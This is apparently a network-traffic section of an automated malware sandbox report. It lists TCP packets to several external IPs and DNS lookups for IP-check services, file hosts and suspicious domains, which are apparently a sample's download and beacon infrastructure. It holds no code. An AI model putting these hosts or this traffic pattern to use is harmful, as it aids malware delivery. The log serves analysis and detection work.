Jul 2, 2024 00:05:08.696044922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696089029 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.696089983 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.696216106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696223021 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696233988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696239948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696244955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696249962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696255922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696260929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696266890 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696274042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.696304083 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.696304083 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697122097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697129011 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697170973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697305918 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697313070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697351933 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697376966 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697455883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697463036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697503090 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697529078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697535992 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697546959 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697552919 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697561979 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697577000 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697578907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697583914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697590113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697599888 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697606087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697608948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697608948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697612047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697618008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.697639942 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.697691917 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.702079058 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.702162027 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.702200890 CEST	80	49733	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.702204943 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.702275038 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.702275991 CEST	49733	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.702428102 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.702478886 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.702497005 CEST	80	49733	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.702624083 CEST	49733	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.704166889 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.704227924 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.704998970 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.705060005 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.709845066 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.709912062 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.709976912 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.710068941 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.710134029 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.710197926 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.710248947 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.710306883 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.710356951 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.710417986 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.710694075 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.710771084 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.711646080 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.711713076 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.712647915 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.712714911 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.717204094 CEST	49733	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.717889071 CEST	49738	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.724056005 CEST	80	49733	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.724538088 CEST	80	49738	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.724616051 CEST	49738	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.739439964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739447117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739459038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739502907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739507914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739518881 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739522934 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739525080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739562035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739568949 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739624023 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739639997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739645958 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739645958 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739651918 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739671946 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739686966 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739712954 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739739895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739747047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739758015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739809990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739809990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739880085 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739886045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739897013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739902973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739907980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739913940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739919901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.739934921 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.739962101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.741900921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.741906881 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.741914034 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.741954088 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.741997957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742002964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742013931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742018938 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742022991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742058992 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742058992 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742158890 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742228031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742234945 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742239952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742244959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742283106 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742306948 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742364883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742371082 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742382050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742432117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742434978 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742440939 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742453098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742499113 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742527962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742535114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742547035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742553949 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742578983 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742599010 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.742961884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742968082 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742979050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.742985010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743009090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743025064 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743025064 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743283033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743307114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743347883 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743359089 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743371010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743462086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743468046 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743479967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743493080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743515968 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743562937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743568897 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743575096 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743581057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743612051 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743634939 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743697882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743704081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743716955 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743748903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743752956 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743755102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743766069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743807077 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743900061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743912935 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743920088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743966103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743966103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.743993044 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.743999004 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744004011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744009972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744056940 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744056940 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744338036 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744344950 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744354963 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744359970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744373083 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744378090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744389057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744390965 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744394064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744440079 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744440079 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744453907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744460106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744472027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744502068 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744543076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744549990 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744555950 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744601011 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744601011 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744682074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744693041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744699955 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744755983 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744755983 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744756937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744762897 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744774103 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744780064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744785070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744838953 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744838953 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.744991064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.744997025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745002031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745012045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745018005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745029926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745035887 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745043993 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.745069027 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.745089054 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.745240927 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745275974 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.745289087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745295048 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745371103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.745436907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745443106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745454073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745459080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.745505095 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.745505095 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.751995087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752002001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752012968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752058983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752074957 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752114058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752120018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752130032 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752130032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752136946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752167940 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752193928 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752334118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752340078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752345085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752350092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752356052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752361059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752374887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752378941 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752392054 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752415895 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752444029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752446890 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752449036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752455950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752502918 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752502918 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752650023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752655983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752667904 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752722025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752724886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752731085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752742052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752749920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752768040 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752789974 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752795935 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752805948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752810955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752840042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752840042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752866030 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752866030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752871990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752882957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752888918 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752935886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752940893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752950907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752950907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.752952099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.752991915 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.753015995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753021002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753026009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753031969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753071070 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.753135920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753140926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753151894 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753158092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753201962 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.753206015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753211975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753212929 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.753218889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753225088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.753256083 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.753309965 CEST	49716	80	192.168.2.6	77.105.133.27

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 00:04:59.032308102 CEST	192.168.2.6	1.1.1.1	0xbf21	Standard query (0)	api.myip.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:00.001964092 CEST	192.168.2.6	1.1.1.1	0x4e34	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.740243912 CEST	192.168.2.6	1.1.1.1	0xadae	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.740628004 CEST	192.168.2.6	1.1.1.1	0xd9a4	Standard query (0)	vk.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.743330002 CEST	192.168.2.6	1.1.1.1	0xd227	Standard query (0)	monoblocked.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.743931055 CEST	192.168.2.6	1.1.1.1	0x1359	Standard query (0)	lop.foxesjoy.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:06.484854937 CEST	192.168.2.6	1.1.1.1	0x89f1	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.643194914 CEST	192.168.2.6	1.1.1.1	0x189f	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:09.404701948 CEST	192.168.2.6	1.1.1.1	0x3218	Standard query (0)	a.884736279.xyz	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:11.472368956 CEST	192.168.2.6	1.1.1.1	0xa4c5	Standard query (0)	sun6-23.userapi.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:13.290513992 CEST	192.168.2.6	1.1.1.1	0xe079	Standard query (0)	sun6-22.userapi.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:14.501615047 CEST	192.168.2.6	1.1.1.1	0x1764	Standard query (0)	sun6-21.userapi.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:24.938530922 CEST	192.168.2.6	1.1.1.1	0xbdcc	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
